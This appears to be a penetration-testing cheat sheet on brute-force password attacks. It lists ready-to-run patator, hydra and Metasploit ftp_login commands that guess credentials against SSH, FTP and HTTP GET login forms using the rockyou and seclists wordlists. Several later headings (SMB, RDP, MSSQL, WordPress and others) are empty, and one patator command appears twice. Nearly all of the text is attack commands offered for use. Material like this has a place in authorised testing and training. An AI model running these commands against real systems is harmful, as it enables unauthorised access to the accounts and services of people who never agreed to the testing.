Brute-Force attack

SSH

patator ssh_login host=10.5.5.11 port=22 user=dev password=FILE0 0=/usr/share/wordlists/rockyou.txt persistent=0 -x ignore:mesg='Authentication failed.' -x quit:code=0

FTP

hydra -l user -P /usr/share/wordlists/rockyou.txt -t 32 ftp://192.168.0.1

# Metasploit
msf
use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > show options
msf auxiliary(ftp_login) > set PASS_FILE /usr/share/wordlist/rockyou.txt
msf auxiliary(ftp_login) > set USER_FILE ./users.txt
msf auxiliary(ftp_login) > set RHOSTS 10.11.1.8,13,14,22
msf auxiliary(ftp_login) > run

HTTP/HTTPS GET

patator  http_fuzz  method=GET  follow=0  accept_cookie=0  --threads=1  timeout=10 url="http://192.168.1.44/?username=FILE1&password=FILE0&Login=Login" 
0=/usr/share/seclists/Usernames/top_shortlist.txt 1=/usr/share/seclists/Passwords/rockyou-40.txt header="Cookie: security=low; PHPSESSID=${SESSIONID}" -x quit:fgrep='Welcome to the password protected area'

patator http_fuzz method=GET follow=0 accept_cookie=0 timeout=10 url="http://192.168.142.214/admin.php?username=FILE0&password=FILE1" 0=ldap.txt 1=ldap.txt -x ignore:fgrep='Invalid login'

patator http_fuzz method=GET follow=0 accept_cookie=0 timeout=10 url="http://192.168.142.214/admin.php?username=FILE0&password=FILE1" 0=ldap.txt 1=ldap.txt -x ignore:fgrep='Invalid login'

HTTP/HTTPS POST

HTTP BASIC AUTH (in case of tomcat platform )

HTTP POST with cewl

SMB

RDP

MSSQL

WordPress

Last updated